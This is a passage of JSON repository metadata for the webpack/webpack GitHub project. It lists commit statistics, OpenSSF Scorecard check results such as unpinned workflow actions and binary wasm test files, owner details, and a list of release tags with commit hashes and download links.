"webpack"}},"created_at":"2012-03-10T10:08:14.000Z","updated_at":"2026-08-22T08:28:27.000Z","dependencies_parsed_at":"2026-08-08T12:34:57.314Z","dependency_job_id":null,"html_url":"https://github.com/webpack/webpack","commit_stats":{"total_commits":12493,"total_committers":934,"mean_commits":"13.375802997858672","dds":0.5586328343872569,"last_synced_commit":"89dfc9a5c575dc691e3ac6a965d39c854fca3986"},"previous_names":[],"tags_count":670,"template":false,"template_full_name":null,"purl":"pkg:github/webpack/webpack","repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/refs/heads/main","sbom_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/sbom","scorecard":{"id":546233,"data":{"date":"2025-07-28","repo":{"name":"github.com/webpack/webpack","commit":"de79ee457eb921e6e1b186c90c65590789a013ca"},"scorecard":{"version":"v5.2.1-26-g4feedb85","commit":"4feedb857ab8d82158aa9774bf8054df41992180"},"score":6,"checks":[{"name":"Code-Review","score":5,"reason":"Found 12/24 approved changesets -- score normalized to 5","details":null,"documentation":{"short":"Determines if the project requires human code review before pull requests (aka merge requests) are merged.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#code-review"}},{"name":"Packaging","score":-1,"reason":"packaging workflow not detected","details":["Warn: no GitHub/GitLab publishing workflow detected."],"documentation":{"short":"Determines if the project is published as a package that others can easily download, install, easily update, and uninstall.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#packaging"}},{"name":"Maintained","score":10,"reason":"30 commit(s) and 12 issue activity found in the last 90 days -- score normalized to 10","details":null,"documentation":{"short":"Determines if the project is \"actively maintained\".","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#maintained"}},{"name":"Dangerous-Workflow","score":10,"reason":"no dangerous workflow patterns detected","details":null,"documentation":{"short":"Determines if the project's GitHub Action workflows avoid dangerous patterns.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#dangerous-workflow"}},{"name":"Token-Permissions","score":10,"reason":"GitHub workflow tokens follow principle of least privilege","details":["Info: topLevel 'contents' permission set to 'read': .github/workflows/dependency-review.yml:6","Info: topLevel 'contents' permission set to 'read': .github/workflows/examples.yml:8","Info: topLevel 'contents' permission set to 'read': .github/workflows/test.yml:13","Info: no jobLevel write permissions found"],"documentation":{"short":"Determines if the project's workflows follow the principle of least privilege.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#token-permissions"}},{"name":"Security-Policy","score":9,"reason":"security policy file detected","details":["Info: security policy file detected: SECURITY.md:1","Info: Found linked content: SECURITY.md:1","Warn: One or no descriptive hints of disclosure, vulnerability, and/or timelines in security policy","Info: Found text in security policy: SECURITY.md:1"],"documentation":{"short":"Determines if the project has published a security policy.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#security-policy"}},{"name":"CII-Best-Practices","score":2,"reason":"badge detected: InProgress","details":null,"documentation":{"short":"Determines if the project has an OpenSSF (formerly CII) Best Practices Badge.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#cii-best-practices"}},{"name":"License","score":10,"reason":"license file detected","details":["Info: project has a license file: LICENSE:0","Info: FSF or OSI recognized license: MIT License: LICENSE:0"],"documentation":{"short":"Determines if the project has defined a license.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#license"}},{"name":"Signed-Releases","score":-1,"reason":"no releases found","details":null,"documentation":{"short":"Determines if the project cryptographically signs release artifacts.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#signed-releases"}},{"name":"Branch-Protection","score":-1,"reason":"internal error: error during branchesHandler.setup: internal error: githubv4.Query: Resource not accessible by integration","details":null,"documentation":{"short":"Determines if the default and release branches are protected with GitHub's branch protection settings.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#branch-protection"}},{"name":"Binary-Artifacts","score":0,"reason":"binaries present in source code","details":["Warn: binary detected: examples/nodejs-addons/file.node:1","Warn: binary detected: examples/wasm-bindgen-esm/pkg/hi_wasm_bg.wasm:1","Warn: binary detected: examples/wasm-simple/add.wasm:1","Warn: binary detected: examples/wasm-simple/factorial.wasm:1","Warn: binary detected: examples/wasm-simple/fibonacci.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory2.wasm:1","Warn: binary detected: test/cases/wasm/decoding/memory3.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/other.wasm:1","Warn: binary detected: test/cases/wasm/imports-complex-types/wasm.wasm:1","Warn: binary detected: test/cases/wasm/imports-multiple/wasm.wasm:1","Warn: binary detected: test/cases/wasm/v128/v128.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-async/testFunction.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/cases/wasm/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/configCases/wasm/externref/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/configCases/wasm/missing-wasm-experiment/wasm.wasm:1","Warn: binary detected: test/configCases/wasm/reference-types/pkg/wasm_lib_bg.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/Q_rsqrt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/duff.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fact.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/fast-math.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/popcnt.wasm:1","Warn: binary detected: test/statsCases/wasm-explorer-examples-sync/testFunction.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/0/wasm.wasm:1","Warn: binary detected: test/watchCases/wasm/caching/1/wasm.wasm:1"],"documentation":{"short":"Determines if the project has generated executable (binary) artifacts in the source repository.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#binary-artifacts"}},{"name":"Pinned-Dependencies","score":0,"reason":"dependency not pinned by hash detected -- score normalized to 0","details":["Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:13: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/dependency-review.yml:15: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/dependency-review.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:16: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/examples.yml:20: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/examples.yml:29: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/examples.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:19: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:21: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:27: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:33: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:39: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:53: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:55: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:72: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:77: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:85: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:96: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:98: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:109: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:111: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:118: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:124: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:162: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:163: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:174: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: GitHub-owned GitHubAction not pinned by hash: .github/workflows/test.yml:200: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Warn: third-party GitHubAction not pinned by hash: .github/workflows/test.yml:207: update your workflow using https://app.stepsecurity.io/secureworkflow/webpack/webpack/test.yml/main?enable=pin","Info:   0 out of  22 GitHub-owned GitHubAction dependencies pinned","Info:   0 out of   4 third-party GitHubAction dependencies pinned"],"documentation":{"short":"Determines if the project has declared and pinned the dependencies of its build process.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#pinned-dependencies"}},{"name":"Fuzzing","score":0,"reason":"project is not fuzzed","details":["Warn: no fuzzer integrations found"],"documentation":{"short":"Determines if the project uses fuzzing.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#fuzzing"}},{"name":"SAST","score":0,"reason":"SAST tool is not run on all commits -- score normalized to 0","details":["Warn: 0 commits out of 28 are checked with a SAST tool"],"documentation":{"short":"Determines if the project uses static code analysis.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#sast"}},{"name":"Vulnerabilities","score":10,"reason":"0 existing vulnerabilities detected","details":null,"documentation":{"short":"Determines if the project has open, known unfixed vulnerabilities.","url":"https://github.com/ossf/scorecard/blob/4feedb857ab8d82158aa9774bf8054df41992180/docs/checks.md#vulnerabilities"}}]},"last_synced_at":"2025-08-20T09:35:41.151Z","repository_id":2686067,"created_at":"2025-08-20T09:35:41.151Z","updated_at":"2025-08-20T09:35:41.151Z"},"host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":286080680,"owners_count":36825724,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2026-08-06T04:43:03.162Z","status":"online","status_checked_at":"2026-08-22T02:00:06.114Z","response_time":51,"last_error":null,"robots_txt_status":"success","robots_txt_updated_at":"2025-07-24T06:49:26.215Z","robots_txt_url":"https://github.com/robots.txt","online":true,"can_crawl_api":true,"host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"},"owner_record":{"login":"webpack","name":"webpack","uuid":"2105791","kind":"organization","description":"","email":null,"website":"https://webpack.js.org","location":null,"twitter":null,"company":null,"icon_url":"https://avatars.githubusercontent.com/u/2105791?v=4","repositories_count":50,"last_synced_at":"2024-10-29T23:38:53.364Z","metadata":{"has_sponsors_listing":false,"funding":{"open_collective":"webpack"}},"html_url":"https://github.com/webpack","funding_links":["https://opencollective.com/webpack"],"total_stars":95072,"followers":924,"following":0,"created_at":"2022-11-02T16:19:08.894Z","updated_at":"2024-10-29T23:38:53.365Z","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/webpack/repositories"},"tags":[{"name":"v5.109.2","sha":"6a24bd65b72c43207c36ce61b54e1f5833486906","kind":"tag","published_at":"2026-07-28T18:14:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.2/manifests"},{"name":"v5.109.1","sha":"ec3908838175b79c004f61f9bf53d57a6d0e52f8","kind":"tag","published_at":"2026-07-27T21:58:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.1/manifests"},{"name":"v5.109.0","sha":"21cd11a1f53567a42eee3a0be822b968a1ffcb12","kind":"tag","published_at":"2026-07-23T19:19:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.109.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.109.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.109.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.109.0/manifests"},{"name":"v5.108.4","sha":"bb9ccfd32b8059819204a48bdb5436c9266dcdf0","kind":"tag","published_at":"2026-07-04T18:09:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.4/manifests"},{"name":"v5.108.3","sha":"6844305fc2d9bceab547b6aae6fcd7ab12d598d8","kind":"tag","published_at":"2026-06-29T22:00:20.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.3/manifests"},{"name":"v5.108.2","sha":"4dfe770e543f8e0c59184b9767e19b604d01af88","kind":"tag","published_at":"2026-06-29T12:56:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.2/manifests"},{"name":"v5.108.1","sha":"da91761ed92c8e133ee321c7db4ad6c4698cae0a","kind":"tag","published_at":"2026-06-26T13:04:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.1/manifests"},{"name":"v5.108.0","sha":"322b0603d6cae784063482cdc3cf8ca0b135a422","kind":"tag","published_at":"2026-06-25T09:40:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.108.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.108.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.108.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.108.0/manifests"},{"name":"v5.107.2","sha":"cfb24a4af6ea68034b25f80e14f95aaeaad6d596","kind":"tag","published_at":"2026-05-25T15:18:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.2/manifests"},{"name":"v5.107.1","sha":"a1ce7ebea4069d31ba27da07c07839d9dc1d69d6","kind":"tag","published_at":"2026-05-21T14:29:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.1/manifests"},{"name":"v5.107.0","sha":"4657874201bb3a098445fca14e2f271c82a3f91c","kind":"tag","published_at":"2026-05-20T09:40:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.107.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.107.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.107.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.107.0/manifests"},{"name":"v5.106.2","sha":"0d7e3e0153f0696311a590f90620506e8ab166ac","kind":"tag","published_at":"2026-04-15T11:44:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/